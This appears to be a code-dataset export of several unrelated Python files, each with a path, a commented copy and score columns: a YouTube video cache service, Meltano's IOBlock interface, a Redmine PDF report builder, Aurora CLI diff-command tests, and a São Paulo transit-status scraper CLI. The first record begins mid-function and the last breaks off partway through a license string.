snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"video_id": video_id,
"title": snippet["title"],
"view_count": statistics["viewCount"],
"duration": contentDetails["duration"],
"channel_id": snippet["channelId"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(video_id):
video = Video.query.get(video_id)
if not video:
fetched_data = VideoService.fetch(video_id)
video = Video(**fetched_data)
db.session.add(video)
db.session.commit()
return video
def get_youtube_service():
if "youtube" not in g:
g.youtube = build(
current_app.config["YOUTUBE_API_SERVICE_NAME"],
current_app.config["YOUTUBE_API_VERSION"],
developerKey=current_app.config["DEVELOPER_KEY"])
return g.youtube | 0.188997 | 0.098555 |
from abc import ABCMeta, abstractmethod
from asyncio import StreamWriter, Task
from typing import Optional, Tuple
from meltano.core.logging.utils import SubprocessOutputWriter
class IOBlock(metaclass=ABCMeta):
"""The IOBlock interface is a basic block that Consumes, Produces, or Consume and Produces (Transforms) output.
Underlying implementation could be subprocesses (ala Singer Plugins), or stream transformers, basically,
any class that satisfies the IOBlock interface.
"""
@property
@abstractmethod
def stdin(self) -> Optional[StreamWriter]:
"""If a block requires input, return the StreamWriter that should be used for writes.
Returns:
StreamWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@property
@abstractmethod
def consumer(self) -> bool:
"""Consumer indicates whether or not this block is a consumer and requires input."""
raise NotImplementedError
@property
@abstractmethod
def producer(self) -> bool:
"""Indicate whether or not this block is a producer of output."""
raise NotImplementedError
@property
@abstractmethod
def string_id(self) -> str:
"""Return a string identifier for this block."""
raise NotImplementedError
@abstractmethod
def stdout_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stdout_link to instruct block to link/write stdout content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def stderr_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stderr_link to instruct block to link/write stderr content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def start(self) -> None:
"""Start the block.
Whatever that might entail (spwaning a process, spinning up a async task that will handle transforms, etc)
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def stop(self, kill: bool = True) -> None:
"""Stop a block.
Args:
kill: whether or not to send a SIGKILL. If false, a SIGTERM is sent.
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def proxy_stdout(self) -> Task:
"""Start proxying stdout to the linked stdout destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_stderr(self) -> Task:
"""Start proxying stderr to the linked stderr destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_io(self) -> Tuple[Task, Task]:
"""Start proxying stdout AND stderr to the linked destinations.
Returns:
proxy_stdout Task and proxy_stderr Task
"""
stdout = self.proxy_stdout()
stderr = self.proxy_stderr()
return stdout, stderr
@abstractmethod
async def pre(self, context: object) -> None:
"""Execute pre-start tasks.
Args:
context: invocation context to use for this execution.
"""
pass
@abstractmethod
async def post(self) -> None:
"""Execute post-stop tasks."""
pass
@abstractmethod
async def close_stdin(self) -> None:
"""Close the underlying stdin if the block is a producer."""
pass | src/meltano/core/block/ioblock.py | from abc import ABCMeta, abstractmethod
from asyncio import StreamWriter, Task
from typing import Optional, Tuple
from meltano.core.logging.utils import SubprocessOutputWriter
class IOBlock(metaclass=ABCMeta):
"""The IOBlock interface is a basic block that Consumes, Produces, or Consume and Produces (Transforms) output.
Underlying implementation could be subprocesses (ala Singer Plugins), or stream transformers, basically,
any class that satisfies the IOBlock interface.
"""
@property
@abstractmethod
def stdin(self) -> Optional[StreamWriter]:
"""If a block requires input, return the StreamWriter that should be used for writes.
Returns:
StreamWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@property
@abstractmethod
def consumer(self) -> bool:
"""Consumer indicates whether or not this block is a consumer and requires input."""
raise NotImplementedError
@property
@abstractmethod
def producer(self) -> bool:
"""Indicate whether or not this block is a producer of output."""
raise NotImplementedError
@property
@abstractmethod
def string_id(self) -> str:
"""Return a string identifier for this block."""
raise NotImplementedError
@abstractmethod
def stdout_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stdout_link to instruct block to link/write stdout content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def stderr_link(self, dst: SubprocessOutputWriter) -> None:
"""Use stderr_link to instruct block to link/write stderr content to dst.
Args:
dst: SubprocessOutputWriter
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def start(self) -> None:
"""Start the block.
Whatever that might entail (spwaning a process, spinning up a async task that will handle transforms, etc)
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
async def stop(self, kill: bool = True) -> None:
"""Stop a block.
Args:
kill: whether or not to send a SIGKILL. If false, a SIGTERM is sent.
Raises:
NotImplementedError
"""
raise NotImplementedError
@abstractmethod
def proxy_stdout(self) -> Task:
"""Start proxying stdout to the linked stdout destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_stderr(self) -> Task:
"""Start proxying stderr to the linked stderr destinations.
Returns: Future of the proxy task.
"""
raise NotImplementedError
@abstractmethod
def proxy_io(self) -> Tuple[Task, Task]:
"""Start proxying stdout AND stderr to the linked destinations.
Returns:
proxy_stdout Task and proxy_stderr Task
"""
stdout = self.proxy_stdout()
stderr = self.proxy_stderr()
return stdout, stderr
@abstractmethod
async def pre(self, context: object) -> None:
"""Execute pre-start tasks.
Args:
context: invocation context to use for this execution.
"""
pass
@abstractmethod
async def post(self) -> None:
"""Execute post-stop tasks."""
pass
@abstractmethod
async def close_stdin(self) -> None:
"""Close the underlying stdin if the block is a producer."""
pass | 0.942042 | 0.262186 |
from reportlab.lib.pagesizes import A4
from reportlab.lib import colors
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import inch
from os import path
class Report:
"""Report class for operating Redmine reports.
Provides some basic settings for report generation."""
def __init__(self):
self.doc = None
self.elements = []
self.table_style = None
self.header_style = None
self.text_style = None
def assign_styles(self):
self.table_style = TableStyle([('ROWBACKGROUNDS', (0, 0), (-1, -1), [colors.aliceblue, colors.white]),
('TEXTCOLOR', (0, 0), (-1, 0), colors.grey), # First row
('TEXTCOLOR', (0, -1), (-1, -1), colors.blueviolet), # Last row
('TEXTCOLOR', (0, 1), (-1, -2), colors.black), # Rows in the middle
('FONT', (0, 0), (-1, -1), 'FreeSans', 8),
('ALIGN', (1, 1), (-1, -1), 'RIGHT'), # Align numbers
('BACKGROUND', (0, -1), (-1, -1), colors.white),
('LINEABOVE', (0, -1), (-1, -1), 0.5, colors.lightgrey),
]
)
self.header_style = TableStyle([('FONT', (0, 0), (-1, -1), 'FreeSans', 9),
('TEXTCOLOR', (0, 0), (-1, -1), colors.darkblue),
]
)
self.text_style = getSampleStyleSheet()
def create(self, filename='redmine_report.pdf', pagesize=A4):
"""Create report."""
self.doc = SimpleDocTemplate(filename=filename,
pagesize=pagesize,
title='Redmine report',
leftMargin=0.6*inch,
rightMargin=0.6*inch,
topMargin=0.25*inch,
bottomMargin=0.25*inch
)
pdfmetrics.registerFont(TTFont('FreeSans', path.join('fonts', 'FreeSans.ttf')))
self.assign_styles()
def add_table(self, table):
"""Add new table to the report."""
tb = Table(table, colWidths=[110] + [None] * (len(table[0]) - 1))
tb.setStyle(self.table_style)
self.elements.append(tb)
def add_header(self, header):
"""Add header table row."""
hd = Table([[header]])
hd.setStyle(self.header_style)
self.elements.append(hd)
def build(self):
"""Write the report to disk."""
self.doc.build(self.elements)
def add_text(self, text, header=None, space_after=None):
"""Add a new text paragraph."""
if not header:
style = self.text_style['Normal']
else:
style = self.text_style['Heading' + str(header)]
par = Paragraph('<font name="FreeSans">' + text + '</font>', style)
self.elements.append(par)
if space_after:
self.add_space(num_inches=space_after)
def add_space(self, num_inches=0.2):
"""Add empty vertical space."""
self.elements.append(Spacer(1, num_inches * inch)) | report.py | from reportlab.lib.pagesizes import A4
from reportlab.lib import colors
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import inch
from os import path
class Report:
"""Report class for operating Redmine reports.
Provides some basic settings for report generation."""
def __init__(self):
self.doc = None
self.elements = []
self.table_style = None
self.header_style = None
self.text_style = None
def assign_styles(self):
self.table_style = TableStyle([('ROWBACKGROUNDS', (0, 0), (-1, -1), [colors.aliceblue, colors.white]),
('TEXTCOLOR', (0, 0), (-1, 0), colors.grey), # First row
('TEXTCOLOR', (0, -1), (-1, -1), colors.blueviolet), # Last row
('TEXTCOLOR', (0, 1), (-1, -2), colors.black), # Rows in the middle
('FONT', (0, 0), (-1, -1), 'FreeSans', 8),
('ALIGN', (1, 1), (-1, -1), 'RIGHT'), # Align numbers
('BACKGROUND', (0, -1), (-1, -1), colors.white),
('LINEABOVE', (0, -1), (-1, -1), 0.5, colors.lightgrey),
]
)
self.header_style = TableStyle([('FONT', (0, 0), (-1, -1), 'FreeSans', 9),
('TEXTCOLOR', (0, 0), (-1, -1), colors.darkblue),
]
)
self.text_style = getSampleStyleSheet()
def create(self, filename='redmine_report.pdf', pagesize=A4):
"""Create report."""
self.doc = SimpleDocTemplate(filename=filename,
pagesize=pagesize,
title='Redmine report',
leftMargin=0.6*inch,
rightMargin=0.6*inch,
topMargin=0.25*inch,
bottomMargin=0.25*inch
)
pdfmetrics.registerFont(TTFont('FreeSans', path.join('fonts', 'FreeSans.ttf')))
self.assign_styles()
def add_table(self, table):
"""Add new table to the report."""
tb = Table(table, colWidths=[110] + [None] * (len(table[0]) - 1))
tb.setStyle(self.table_style)
self.elements.append(tb)
def add_header(self, header):
"""Add header table row."""
hd = Table([[header]])
hd.setStyle(self.header_style)
self.elements.append(hd)
def build(self):
"""Write the report to disk."""
self.doc.build(self.elements)
def add_text(self, text, header=None, space_after=None):
"""Add a new text paragraph."""
if not header:
style = self.text_style['Normal']
else:
style = self.text_style['Heading' + str(header)]
par = Paragraph('<font name="FreeSans">' + text + '</font>', style)
self.elements.append(par)
if space_after:
self.add_space(num_inches=space_after)
def add_space(self, num_inches=0.2):
"""Add empty vertical space."""
self.elements.append(Spacer(1, num_inches * inch)) | 0.743727 | 0.108945 |
import contextlib
import os
import textwrap
from mock import Mock, call, patch
from pystachio import Empty
from apache.aurora.client.api import SchedulerProxy
from apache.aurora.client.cli import EXIT_OK
from apache.aurora.client.cli.jobs import DiffCommand
from apache.aurora.client.cli.options import TaskInstanceKey
from apache.aurora.config import AuroraConfig
from apache.aurora.config.schema.base import Job
from apache.thermos.config.schema_base import MB, Process, Resources, Task
from .util import AuroraClientCommandTest, FakeAuroraCommandContext, mock_verb_options
from gen.apache.aurora.api.constants import ACTIVE_STATES
from gen.apache.aurora.api.ttypes import (
ConfigGroup,
GetJobUpdateDiffResult,
PopulateJobResult,
Range,
ResponseCode,
Result,
ScheduleStatusResult,
TaskQuery
)
class TestDiffCommand(AuroraClientCommandTest):
def setUp(self):
self._command = DiffCommand()
self._mock_options = mock_verb_options(self._command)
self._mock_options.instance_spec = TaskInstanceKey(self.TEST_JOBKEY, [0, 1])
self._fake_context = FakeAuroraCommandContext()
self._fake_context.set_options(self._mock_options)
self._mock_api = self._fake_context.get_api("test")
@classmethod
def get_job_config(self, is_cron=False):
return AuroraConfig(job=Job(
cluster='west',
role='bozo',
environment='test',
name='the_job',
service=True if not is_cron else False,
cron_schedule='* * * * *' if is_cron else Empty,
task=Task(
name='task',
processes=[Process(cmdline='ls -la', name='process')],
resources=Resources(cpu=1.0, ram=1024 * MB, disk=1024 * MB)
),
instances=3,
))
@classmethod
def create_status_response(cls):
resp = cls.create_simple_success_response()
resp.result = Result(
scheduleStatusResult=ScheduleStatusResult(tasks=set(cls.create_scheduled_tasks())))
return resp
@classmethod
def create_failed_status_response(cls):
return cls.create_blank_response(ResponseCode.INVALID_REQUEST, 'No tasks found for query')
@classmethod
def populate_job_config_result(cls):
populate = cls.create_simple_success_response()
populate.result = Result(populateJobResult=PopulateJobResult(
taskConfig=cls.create_scheduled_tasks()[0].assignedTask.task))
return populate
@classmethod
def get_job_update_diff_result(cls):
diff = cls.create_simple_success_response()
task = cls.create_task_config('foo')
diff.result = Result(getJobUpdateDiffResult=GetJobUpdateDiffResult(
add=set([ConfigGroup(
config=task,
instances=frozenset([Range(first=10, last=10), Range(first=12, last=14)]))]),
remove=frozenset(),
update=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=11, last=11)]))]),
unchanged=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=0, last=9)]))])
))
return diff
def test_service_diff(self):
config = self.get_job_config()
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.return_value = self.get_job_update_diff_result()
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert "\n".join(self._fake_context.get_out()) == textwrap.dedent("""\
This job update will:
add instances: [10], [12-14]
update instances: [11]
with diff:\n\n
not change instances: [0-9]""")
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_service_diff_old_api(self):
config = self.get_job_config()
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.side_effect = SchedulerProxy.ThriftInternalError("Expected")
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_cron_diff(self):
config = self.get_job_config(is_cron=True)
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ') | Chapter4/Aurora/src/test/python/apache/aurora/client/cli/test_diff.py |
import contextlib
import os
import textwrap
from mock import Mock, call, patch
from pystachio import Empty
from apache.aurora.client.api import SchedulerProxy
from apache.aurora.client.cli import EXIT_OK
from apache.aurora.client.cli.jobs import DiffCommand
from apache.aurora.client.cli.options import TaskInstanceKey
from apache.aurora.config import AuroraConfig
from apache.aurora.config.schema.base import Job
from apache.thermos.config.schema_base import MB, Process, Resources, Task
from .util import AuroraClientCommandTest, FakeAuroraCommandContext, mock_verb_options
from gen.apache.aurora.api.constants import ACTIVE_STATES
from gen.apache.aurora.api.ttypes import (
ConfigGroup,
GetJobUpdateDiffResult,
PopulateJobResult,
Range,
ResponseCode,
Result,
ScheduleStatusResult,
TaskQuery
)
class TestDiffCommand(AuroraClientCommandTest):
  """Unit tests for the Aurora CLI `job diff` verb (DiffCommand).

  Each test drives DiffCommand.execute() through a FakeAuroraCommandContext
  whose scheduler API is a mock, covering:
    * service jobs via the scheduler's getJobUpdateDiff API,
    * fallback to the old task-query path when that API raises,
    * cron jobs (which use the task-query path).

  NOTE(review): relies on names imported above this chunk (Mock, call,
  patch, contextlib, textwrap, os, Empty, SchedulerProxy); contextlib.nested
  exists only on Python 2 -- TODO confirm before porting.
  """

  def setUp(self):
    # Fresh command plus mocked options/context for every test case.
    self._command = DiffCommand()
    self._mock_options = mock_verb_options(self._command)
    # The diff is requested for instances 0 and 1 of the shared test job key.
    self._mock_options.instance_spec = TaskInstanceKey(self.TEST_JOBKEY, [0, 1])
    self._fake_context = FakeAuroraCommandContext()
    self._fake_context.set_options(self._mock_options)
    # The fake context hands back a mock scheduler API for cluster "test".
    self._mock_api = self._fake_context.get_api("test")

  @classmethod
  def get_job_config(self, is_cron=False):
    """Build a minimal AuroraConfig; cron-style when is_cron is True.

    NOTE(review): decorated @classmethod but the first parameter is named
    `self` rather than `cls` -- functional, yet misleading.  `Empty` is
    presumably pystachio's unset marker imported above this chunk; confirm.
    """
    return AuroraConfig(job=Job(
        cluster='west',
        role='bozo',
        environment='test',
        name='the_job',
        # A job is either a long-running service or a cron job, never both.
        service=True if not is_cron else False,
        cron_schedule='* * * * *' if is_cron else Empty,
        task=Task(
            name='task',
            processes=[Process(cmdline='ls -la', name='process')],
            resources=Resources(cpu=1.0, ram=1024 * MB, disk=1024 * MB)
        ),
        instances=3,
    ))

  @classmethod
  def create_status_response(cls):
    """Successful scheduler response carrying the canned scheduled tasks."""
    resp = cls.create_simple_success_response()
    resp.result = Result(
        scheduleStatusResult=ScheduleStatusResult(tasks=set(cls.create_scheduled_tasks())))
    return resp

  @classmethod
  def create_failed_status_response(cls):
    """Error response for a status query that matched no tasks."""
    return cls.create_blank_response(ResponseCode.INVALID_REQUEST, 'No tasks found for query')

  @classmethod
  def populate_job_config_result(cls):
    """Successful populateJobConfig response built from a canned task config."""
    populate = cls.create_simple_success_response()
    populate.result = Result(populateJobResult=PopulateJobResult(
        taskConfig=cls.create_scheduled_tasks()[0].assignedTask.task))
    return populate

  @classmethod
  def get_job_update_diff_result(cls):
    """Canned getJobUpdateDiff response.

    Adds instances [10] and [12-14], updates [11], leaves [0-9] unchanged,
    removes nothing -- matching the text asserted in test_service_diff.
    """
    diff = cls.create_simple_success_response()
    task = cls.create_task_config('foo')
    diff.result = Result(getJobUpdateDiffResult=GetJobUpdateDiffResult(
        add=set([ConfigGroup(
            config=task,
            instances=frozenset([Range(first=10, last=10), Range(first=12, last=14)]))]),
        remove=frozenset(),
        update=frozenset([ConfigGroup(
            config=task,
            instances=frozenset([Range(first=11, last=11)]))]),
        unchanged=frozenset([ConfigGroup(
            config=task,
            instances=frozenset([Range(first=0, last=9)]))])
    ))
    return diff

  def test_service_diff(self):
    """Service job: diff uses the update-diff API and renders its groups."""
    config = self.get_job_config()
    self._fake_context.get_job_config = Mock(return_value=config)
    self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
    self._mock_api.get_job_update_diff.return_value = self.get_job_update_diff_result()
    # Patch out the external diff viewer and the JSON parsing of configs.
    with contextlib.nested(
        patch('subprocess.call', return_value=0),
        patch('json.loads', return_value={})) as (subprocess_patch, _):
      result = self._command.execute(self._fake_context)
      assert result == EXIT_OK
      assert self._mock_api.populate_job_config.mock_calls == [call(config)]
      assert self._mock_api.get_job_update_diff.mock_calls == [
          call(config, self._mock_options.instance_spec.instance)
      ]
      assert "\n".join(self._fake_context.get_out()) == textwrap.dedent("""\
          This job update will:
          add instances: [10], [12-14]
          update instances: [11]
          with diff:\n\n
          not change instances: [0-9]""")
      # The external viewer (DIFF_VIEWER env var, or plain `diff`) runs once.
      assert subprocess_patch.call_count == 1
      assert subprocess_patch.call_args[0][0].startswith(
          os.environ.get('DIFF_VIEWER', 'diff') + ' ')

  def test_service_diff_old_api(self):
    """Falls back to a task status query when the update-diff RPC fails."""
    config = self.get_job_config()
    query = TaskQuery(
        jobKeys=[self.TEST_JOBKEY.to_thrift()],
        statuses=ACTIVE_STATES)
    self._fake_context.get_job_config = Mock(return_value=config)
    self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
    # Simulate an older scheduler that lacks getJobUpdateDiff.
    self._mock_api.get_job_update_diff.side_effect = SchedulerProxy.ThriftInternalError("Expected")
    self._mock_api.query.return_value = self.create_empty_task_result()
    self._mock_api.build_query.return_value = query
    with contextlib.nested(
        patch('subprocess.call', return_value=0),
        patch('json.loads', return_value={})) as (subprocess_patch, _):
      result = self._command.execute(self._fake_context)
      assert result == EXIT_OK
      assert self._mock_api.populate_job_config.mock_calls == [call(config)]
      # The new API is attempted first, then the old query path is used.
      assert self._mock_api.get_job_update_diff.mock_calls == [
          call(config, self._mock_options.instance_spec.instance)
      ]
      assert self._mock_api.query.mock_calls == [call(query)]
      assert subprocess_patch.call_count == 1
      assert subprocess_patch.call_args[0][0].startswith(
          os.environ.get('DIFF_VIEWER', 'diff') + ' ')

  def test_cron_diff(self):
    """Cron job: diff always uses the task status query path."""
    config = self.get_job_config(is_cron=True)
    query = TaskQuery(
        jobKeys=[self.TEST_JOBKEY.to_thrift()],
        statuses=ACTIVE_STATES)
    self._fake_context.get_job_config = Mock(return_value=config)
    self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
    self._mock_api.query.return_value = self.create_empty_task_result()
    self._mock_api.build_query.return_value = query
    with contextlib.nested(
        patch('subprocess.call', return_value=0),
        patch('json.loads', return_value={})) as (subprocess_patch, _):
      result = self._command.execute(self._fake_context)
      assert result == EXIT_OK
      assert self._mock_api.populate_job_config.mock_calls == [call(config)]
      assert self._mock_api.query.mock_calls == [call(query)]
      assert subprocess_patch.call_count == 1
      # Trailing "| 0.543833 | 0.094052 |" below is dataset-export residue.
      assert subprocess_patch.call_args[0][0].startswith(
          os.environ.get('DIFF_VIEWER', 'diff') + ' ') | 0.543833 | 0.094052 |
# Standard libraries. Should not fail.
import sys
import json
import textwrap
from argparse import Action
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
# Required 3rd-party libraries.
try:
from requests_html import HTMLSession
from tabulate import tabulate
from colorama import init
from colorama import Fore
from colorama import Style
init(autoreset=True)
except ImportError as err:
print(
'TPSP: impossible to import 3rd-party libraries.\n'
'Latest traceback: {0}'.format(err.args[0])
)
sys.exit(1)
PROGRAM_NAME = 'tpsp'
PROGRAM_DESCRIPTION = 'CLI to CPTM and Metro lines status'
PROGRAM_VERSION = '1.0.1'
PROGRAM_URL = 'https://github.com/caian-org/tpsp'
COPYRIGHT_INFO = """
The person who associated a work with this deed has dedicated the work to the
public domain by waiving all of his or her rights to the work worldwide under
copyright law, including all related and neighboring rights, to the extent
allowed by law.
You can copy, modify, distribute and perform the work, even for commercial
purposes, all without asking permission.
AFFIRMER OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE,
INCLUDING WITHOUT LIMITATION WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE, NON INFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER
DEFECTS, ACCURACY, OR THE PRESENT OR ABSENCE OF ERRORS, WHETHER OR NOT
DISCOVERABLE, ALL TO THE GREATEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW.
For more information, please see
<http://creativecommons.org/publicdomain/zero/1.0/>
"""
class CLI:
    """Builds the tpsp argument parser and exposes argv parsing."""

    def __init__(self):
        # Service names are discovered from Service subclasses (cptm, metro).
        self.sources = list(Service.all())

        banner = textwrap.dedent(
            '''\
            {0}: {1}
            {0} (portuguese for "São Paulo public transportation")
            is a tiny command-line tool that tells you the current
            status of CPTM's and Metro lines.
            '''.format(PROGRAM_NAME, PROGRAM_DESCRIPTION)
        )
        footer = textwrap.dedent(
            '''\
            examples:
            $ {0} cptm
            # => shows the current state of all CPTM lines
            $ {0} metro --json
            # => shows the current state of all Metro lines and formats
            the output in JSON
            This is a Free and Open-Source Software (FOSS).
            Project page: <{1}>'''.format(PROGRAM_NAME, PROGRAM_URL)
        )

        self.parser = ArgumentParser(
            prog=PROGRAM_NAME,
            formatter_class=RawTextHelpFormatter,
            description=banner,
            epilog=footer,
        )

        # --------------------------------------------------
        self.parser.add_argument(
            'service',
            action='store',
            choices=self.sources,
            nargs=1,
            type=str,
            help='the public transportation service',
        )
        self.parser.add_argument(
            '-v', '--version',
            action='version',
            version='{0} ({1})'.format(PROGRAM_NAME, PROGRAM_VERSION),
            help='show the program version and exit',
        )
        self.parser.add_argument(
            '-j', '--json',
            action='store_true',
            dest='json',
            help='show the output in JSON format',
        )
        self.parser.add_argument(
            '--copyright',
            action=Copyright,
            nargs=0,
            help='show the copyright information and exit',
        )

    def act(self):
        """Parse sys.argv and return the resulting namespace."""
        return self.parser.parse_args()
class Copyright(Action):
    """argparse action: print the license text and exit successfully.

    Fix: the previous no-op ``__init__`` override only forwarded to
    ``super().__init__`` and has been removed; ``Action.__init__`` is
    inherited directly with identical behavior.
    """

    def __call__(self, parser, namespace, values, option_string=None):
        # Invoked by argparse when --copyright is seen; never returns.
        print(COPYRIGHT_INFO)
        sys.exit(0)
class Service:
    """Base class for transit scrapers; subclasses register by existing."""

    @staticmethod
    def all():
        """Return an iterator of lowercased names of all Service subclasses."""
        return (subclass.__name__.lower() for subclass in Service.__subclasses__())
class CPTM(Service):
    """Scrapes the status of each CPTM line from the company home page."""

    def __init__(self):
        self.url = 'https://www.cptm.sp.gov.br/Pages/Home.aspx'
        self.session = HTMLSession()

    def fetch_data(self):
        """Yield one {'line', 'status'} dict per known CPTM line."""
        response = self.session.get(self.url)
        # Each line has a CSS class named after the line's color.
        for ref in ['rubi', 'diamante', 'esmeralda', 'turquesa', 'coral', 'safira', 'jade']:
            element = response.html.find('.{0}'.format(ref), first=True)
            # The element text repeats the line name in caps; strip it out.
            yield {
                'line': ref.capitalize(),
                'status': element.text.replace(ref.upper(), ''),
            }
class METRO(Service):
    """Scrapes the status of each Metro line from the 'direto do Metro' page."""

    def __init__(self):
        self.url = 'http://www.metro.sp.gov.br/Sistemas/direto-do-metro-via4/diretodoMetroHome.aspx'
        self.session = HTMLSession()

    def fetch_data(self):
        """Yield one {'line', 'status'} dict per Metro line."""
        response = self.session.get(self.url)
        line_names = response.html.find('.{0}'.format('nomeDaLinha'))
        line_states = response.html.find('.{0}'.format('statusDaLinha'))
        for index, line_name in enumerate(line_names):
            # Names come as "<number>-<name>"; keep only the name part.
            yield {
                'line': line_name.text.split('-')[1].strip(),
                'status': line_states[index].text,
            }
class Output:
    """Renders fetched line data as a colorized table or a JSON document."""

    def __init__(self, data):
        # `data` is an iterable of {'line': ..., 'status': ...} dicts.
        self.data = data

    @property
    def table(self):
        """Colorized, human-readable table of line statuses."""
        def colorize(status):
            # First matching keyword wins; unknown statuses stay white.
            palette = (
                ('normal', Fore.GREEN),
                ('reduzida', Fore.YELLOW),
                ('paralisada', Fore.RED),
                ('encerrada', Style.DIM),
            )
            color = next((c for word, c in palette if word in status), Fore.WHITE)
            return '{}{}{}'.format(color, status.title(), Style.RESET_ALL)

        headers = [
            '{}{}{}'.format(Style.BRIGHT, col, Style.RESET_ALL)
            for col in ('Linha', 'Status')
        ]
        rows = [
            [entry['line'], colorize(entry['status'].lower())]
            for entry in self.data
        ]
        return tabulate(rows, headers=headers)

    @property
    def json(self):
        """JSON envelope ({code, data, message}) around the fetched rows."""
        payload = {'code': 200, 'data': list(self.data), 'message': 'success'}
        return json.dumps(payload, ensure_ascii=False, sort_keys=True, indent=4)
def main():
    """Entry point: parse args, fetch the chosen service's data, print it."""
    arguments = CLI().act()
    # Resolve the service class (CPTM / METRO) from this module by name.
    service_class = getattr(sys.modules[__name__], arguments.service[0].upper())
    try:
        report = Output(service_class().fetch_data())
        rendered = report.json if arguments.json else report.table
        print('\n{}'.format(rendered))
    except Exception as error:
        print('Could not fetch data\n')
        print(str(error))
        sys.exit(1)
if __name__ == '__main__':
main() | tpsp/__init__.py |
# Standard libraries. Should not fail.
import sys
import json
import textwrap
from argparse import Action
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
# Required 3rd-party libraries.
try:
from requests_html import HTMLSession
from tabulate import tabulate
from colorama import init
from colorama import Fore
from colorama import Style
init(autoreset=True)
except ImportError as err:
print(
'TPSP: impossible to import 3rd-party libraries.\n'
'Latest traceback: {0}'.format(err.args[0])
)
sys.exit(1)
PROGRAM_NAME = 'tpsp'
PROGRAM_DESCRIPTION = 'CLI to CPTM and Metro lines status'
PROGRAM_VERSION = '1.0.1'
PROGRAM_URL = 'https://github.com/caian-org/tpsp'
COPYRIGHT_INFO = """
The person who associated a work with this deed has dedicated the work to the
public domain by waiving all of his or her rights to the work worldwide under
copyright law, including all related and neighboring rights, to the extent
allowed by law.
You can copy, modify, distribute and perform the work, even for commercial
purposes, all without asking permission.
AFFIRMER OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
